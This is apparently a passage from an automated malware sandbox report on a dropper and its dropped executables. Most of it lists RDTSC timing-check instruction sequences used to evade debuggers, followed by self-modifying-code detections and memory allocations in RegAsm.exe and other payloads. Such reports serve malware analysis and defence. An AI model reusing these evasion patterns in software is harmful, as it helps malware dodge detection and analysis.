Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523025D second address: 52302B1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5B320h 0x00000008 jmp 00007F4DA4C5B325h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F4DA4C5B31Eh 0x00000017 mov ebp, esp 0x00000019 jmp 00007F4DA4C5B320h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52302B1 second address: 52302B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52302B5 second address: 52302BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52302BB second address: 52302C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52302C1 second address: 52302C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A02BF second address: 52A02CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5D84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A02CF second address: 52A02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A02D3 second address: 52A0309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4DA4C5D859h 0x00000011 jmp 00007F4DA4C5D850h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0309 second address: 52A0332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DA4C5B325h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0332 second address: 52A0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0338 second address: 52A03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4DA4C5B31Fh 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4DA4C5B324h 0x00000019 sbb esi, 327B59E8h 0x0000001f jmp 00007F4DA4C5B31Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F4DA4C5B328h 0x0000002b xor ah, 00000048h 0x0000002e jmp 00007F4DA4C5B31Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push dword ptr [ebp+08h] 0x00000038 pushad 0x00000039 mov al, 70h 0x0000003b pushfd 0x0000003c jmp 00007F4DA4C5B321h 0x00000041 xor esi, 46C94966h 0x00000047 jmp 00007F4DA4C5B321h 0x0000004c popfd 0x0000004d popad 0x0000004e call 00007F4DA4C5B319h 0x00000053 jmp 00007F4DA4C5B31Eh 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03F3 second address: 52A04CD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5D84Dh 0x00000008 xor al, 00000076h 0x0000000b jmp 00007F4DA4C5D851h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F4DA4C5D850h 0x00000019 and ch, FFFFFF98h 0x0000001c jmp 00007F4DA4C5D84Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 jmp 00007F4DA4C5D859h 0x0000002c mov eax, dword ptr [eax] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4DA4C5D857h 0x00000035 and ax, 14BEh 0x0000003a jmp 00007F4DA4C5D859h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007F4DA4C5D850h 0x00000046 adc ah, FFFFFFB8h 0x00000049 jmp 00007F4DA4C5D84Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F4DA4C5D854h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A04FE second address: 52A0505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0505 second address: 52A05A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 14h 0x00000005 pushfd 0x00000006 jmp 00007F4DA4C5D857h 0x0000000b add cx, 7EEEh 0x00000010 jmp 00007F4DA4C5D859h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 movzx eax, al 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F4DA4C5D853h 0x00000025 adc ecx, 006424FEh 0x0000002b jmp 00007F4DA4C5D859h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F4DA4C5D850h 0x00000037 sub ecx, 02D193F8h 0x0000003d jmp 00007F4DA4C5D84Bh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A05A2 second address: 52A05A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52406AC second address: 52406CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5CBAh 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4DA4C5D853h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52406CE second address: 52406E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52406E6 second address: 5240713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F4DA4C5D84Dh 0x0000000f mov si, CB07h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov dx, 8F2Ah 0x0000001b popad 0x0000001c push FFFFFFFEh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ah, 68h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240713 second address: 5240718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240718 second address: 524072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5D851h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524072D second address: 5240773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 2F9C9D54h 0x0000000d pushad 0x0000000e jmp 00007F4DA4C5B328h 0x00000013 jmp 00007F4DA4C5B322h 0x00000018 popad 0x00000019 add dword ptr [esp], 47C122C4h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240773 second address: 5240779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240779 second address: 524077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524077F second address: 52407B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 17786755h 0x00000010 jmp 00007F4DA4C5D851h 0x00000015 add dword ptr [esp], 5FDC46ABh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52407B8 second address: 524081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4DA4C5B31Ch 0x00000017 sub eax, 269655C8h 0x0000001d jmp 00007F4DA4C5B31Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 call 00007F4DA4C5B326h 0x0000002b push eax 0x0000002c pop ebx 0x0000002d pop esi 0x0000002e popad 0x0000002f push esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524081C second address: 5240821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240821 second address: 52408E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d jmp 00007F4DA4C5B31Eh 0x00000012 pushfd 0x00000013 jmp 00007F4DA4C5B322h 0x00000018 jmp 00007F4DA4C5B325h 0x0000001d popfd 0x0000001e popad 0x0000001f sub esp, 1Ch 0x00000022 jmp 00007F4DA4C5B31Eh 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F4DA4C5B320h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4DA4C5B31Ch 0x00000037 sub si, 41A8h 0x0000003c jmp 00007F4DA4C5B31Bh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F4DA4C5B328h 0x00000048 and eax, 28ECB408h 0x0000004e jmp 00007F4DA4C5B31Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52408E1 second address: 5240995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4DA4C5D84Eh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4DA4C5D858h 0x0000001a xor eax, 65CCD3F8h 0x00000020 jmp 00007F4DA4C5D84Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F4DA4C5D858h 0x0000002c add ah, 00000058h 0x0000002f jmp 00007F4DA4C5D84Bh 0x00000034 popfd 0x00000035 popad 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov cx, 7321h 0x0000003f pushfd 0x00000040 jmp 00007F4DA4C5D84Eh 0x00000045 jmp 00007F4DA4C5D855h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240995 second address: 524099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240A86 second address: 5240AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240AA1 second address: 5240AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DA4C5B31Fh 0x00000009 xor ax, C57Eh 0x0000000e jmp 00007F4DA4C5B329h 0x00000013 popfd 0x00000014 mov cx, 63C7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240AE2 second address: 5240AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 338C7078h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240AEC second address: 5240BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f pushad 0x00000010 mov di, si 0x00000013 mov si, 48F9h 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c call 00007F4DA4C5B322h 0x00000021 call 00007F4DA4C5B322h 0x00000026 pop ecx 0x00000027 pop edx 0x00000028 jmp 00007F4DA4C5B320h 0x0000002d popad 0x0000002e mov eax, dword ptr [esi+10h] 0x00000031 jmp 00007F4DA4C5B320h 0x00000036 test eax, eax 0x00000038 jmp 00007F4DA4C5B320h 0x0000003d jne 00007F4E16F1A4CDh 0x00000043 jmp 00007F4DA4C5B320h 0x00000048 sub eax, eax 0x0000004a jmp 00007F4DA4C5B321h 0x0000004f mov dword ptr [ebp-20h], eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov di, 15BEh 0x00000059 mov bx, CFCAh 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240BA5 second address: 5240BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240BAB second address: 5240BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [esi] 0x0000000a jmp 00007F4DA4C5B326h 0x0000000f mov dword ptr [ebp-24h], ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240BD4 second address: 5240BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240BD8 second address: 5240BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240BDE second address: 5240C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F4DA4C5D859h 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240C16 second address: 5240C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4E16F1A36Bh 0x0000000f pushad 0x00000010 mov al, 50h 0x00000012 pushfd 0x00000013 jmp 00007F4DA4C5B323h 0x00000018 jmp 00007F4DA4C5B323h 0x0000001d popfd 0x0000001e popad 0x0000001f cmp ebx, FFFFFFFFh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, si 0x00000028 call 00007F4DA4C5B31Ch 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240C71 second address: 5240C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5D857h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240C8C second address: 52406AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4E16F1A2FDh 0x0000000d jne 00007F4DA4C5B339h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 008D5678h 0x00000043 jne 00007F4DA4C5B300h 0x00000045 push esi 0x00000046 call 00007F4DA4C5BB83h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007F4DA960EAA4h 0x00000056 mov edi, edi 0x00000058 jmp 00007F4DA4C5B326h 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F4DA4C5B327h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52401EC second address: 524021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4DA4C5D857h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524021D second address: 5240223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240223 second address: 5240247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a mov ch, bh 0x0000000c call 00007F4DA4C5D856h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 4064DC second address: 4064E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 4064E0 second address: 4064E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 4064E9 second address: 4064EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 4064EF second address: 406509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4DA4C5D84Fh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406509 second address: 40650F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 4067FB second address: 4067FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A7C second address: 406A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A80 second address: 406A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A84 second address: 406A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A8E second address: 406A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A92 second address: 406A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406A96 second address: 406AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4DA4C5D846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F4DA4C5D857h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 406AC5 second address: 406ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 409407 second address: 40940C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 40940C second address: 409475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B320h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jp 00007F4DA4C5B317h 0x00000013 push 00000000h 0x00000015 mov edx, dword ptr [ebp+122D3461h] 0x0000001b mov dh, cl 0x0000001d call 00007F4DA4C5B319h 0x00000022 pushad 0x00000023 jmp 00007F4DA4C5B329h 0x00000028 jmp 00007F4DA4C5B321h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 js 00007F4DA4C5B316h 0x00000038 pop edx 0x00000039 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8DE6EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8DE7F9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A90748 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A9DFF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B1495F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 27E6EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 27E7F9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 430748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 43DFF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 4B495F instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: 1580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: 51F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: 26A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: 46A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Memory allocated: 2B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Memory allocated: 2B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 2F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 3140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 5140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Memory allocated: BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Memory allocated: 2820000 memory reserve \| memory write watch
